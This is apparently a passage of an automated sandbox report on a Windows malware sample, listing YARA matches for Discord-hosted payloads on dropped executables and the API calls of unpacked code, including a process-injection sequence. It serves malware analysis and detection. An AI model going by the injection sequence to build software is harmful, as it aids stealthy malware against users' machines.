              Source: fijbuft.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: fijbuft.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: AdvancedRun.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: AdvancedRun.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
              Source: C:\Windows\explorer.exeSection loaded: webio.dll
              Source: 25Kf6vSBoq.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 21.0.C1B2.exe.e80000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 24.0.EA8A.exe.fa0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 24.0.EA8A.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 21.2.C1B2.exe.e80000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 20.0.B82B.exe.850000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 21.0.C1B2.exe.e80000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 24.0.EA8A.exe.fa0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 24.0.EA8A.exe.fa0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 20.0.B82B.exe.850000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 21.0.C1B2.exe.e80000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 20.0.B82B.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 21.0.C1B2.exe.e80000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 20.0.B82B.exe.850000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: C:\Users\user\AppData\Local\Temp\B82B.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: String function: 0041D100 appears 77 times
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: String function: 004212E0 appears 77 times
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: String function: 00410ED0 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: String function: 0040FB00 appears 101 times
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: String function: 6A96D08C appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: String function: 6A91B150 appears 128 times
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: String function: 6A9A5720 appears 43 times
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_0040185B Sleep,NtTerminateProcess,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_00401866 Sleep,NtTerminateProcess,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_0040187A Sleep,NtTerminateProcess,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_0040163B NtMapViewOfSection,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_004018D3 NtTerminateProcess,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_00401884 Sleep,NtTerminateProcess,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_00401888 NtTerminateProcess,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_0040156A NtMapViewOfSection,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_2_004017EA Sleep,NtTerminateProcess,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_1_0040156A NtMapViewOfSection,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_1_004015DB NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 2_1_0040163B NtMapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 13_2_02C30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_0040185B Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_00401866 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_0040187A Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_0040163B NtMapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_004018D3 NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_00401884 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_00401888 NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_0040156A NtMapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_2_004017EA Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_1_0040156A NtMapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_1_004015DB NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_1_0040163B NtMapViewOfSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_0040181C Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402406 NtEnumerateKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00401F25 NtQuerySystemInformation,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00401828 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402431 NtEnumerateKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_004017DA Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_004017F8 NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_0040209A NtQuerySystemInformation,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_004017A3 Sleep,NtTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9598C0 ZwDuplicateObject,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959820 ZwEnumerateKey,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959860 ZwQuerySystemInformation,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9599A0 ZwCreateSection,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959600 ZwOpenKey,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95967A NtQueryInformationProcess,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959660 ZwAllocateVirtualMemory,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959780 ZwMapViewOfSection,LdrInitializeThunk,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AA90 ZwQuerySystemInformationEx,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A932280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B280 ZwWow64DebuggerCall,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959AB0 ZwWaitForMultipleObjects,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94E2BB ZwWaitForAlertByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A911AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A945AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9152A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1AD6 ZwFreeVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AAC0 ZwQueryWnfStateNameInformation,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AAE0 ZwRaiseException,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959AE0 ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959A00 ZwProtectVirtualMemory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959A30 ZwTerminateThread,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A918239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94939F RtlInitializeCriticalSectionEx,ZwDelayExecution,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A3A0 ZwGetCompleteWnfStateSubscription,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959BF0 ZwAlertThreadByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9123F6 ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D131B RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A945306 ZwReleaseKeyedEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959B00 ZwSetValueKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919335 ZwClose,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B48 ZwClose,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AB70 ZwReleaseWorkerFactoryWorker,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912B7E ZwSetInformationThread,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95AB60 ZwReleaseKeyedEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A890 ZwQueryDebugFilterState,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959890 ZwFsControlFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95108B ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B0B0 ZwTraceControl,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9418B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93F0AE ZwSetInformationWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C60A2 ZwQueryInformationFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9510D7 ZwOpenKey,ZwCreateKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9598D0 ZwQueryAttributesFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A0D0 ZwCreateTimer2,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9170C0 ZwClose,RtlFreeHeap,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9500C2 ZwAlertThreadByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9140FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C60E9 ZwOpenKey,ZwClose,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9EF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959830 ZwOpenFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959850 ZwQueryDirectoryFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8858 ZwAlertThreadByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959840 ZwDelayExecution,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92106F ZwOpenKey,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959990 ZwQueryVolumeInformationFile,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DA189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B180 ZwWaitForAlertByThreadId,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959980 ZwCreateEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C6186 ZwQueryValueKey,memmove,RtlInitUnicodeString,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A9B0 ZwQueryLicenseValue,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9951BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95B1A0 ZwWaitForKeyedEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D49A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A920100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959900 ZwOpenEvent,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9B5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A193B ZwRaiseException,ZwTerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95A130 ZwCreateWaitCompletionPacket,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9EF13B ZwOpenKey,ZwCreateKey,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A959920 ZwDuplicateToken,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,
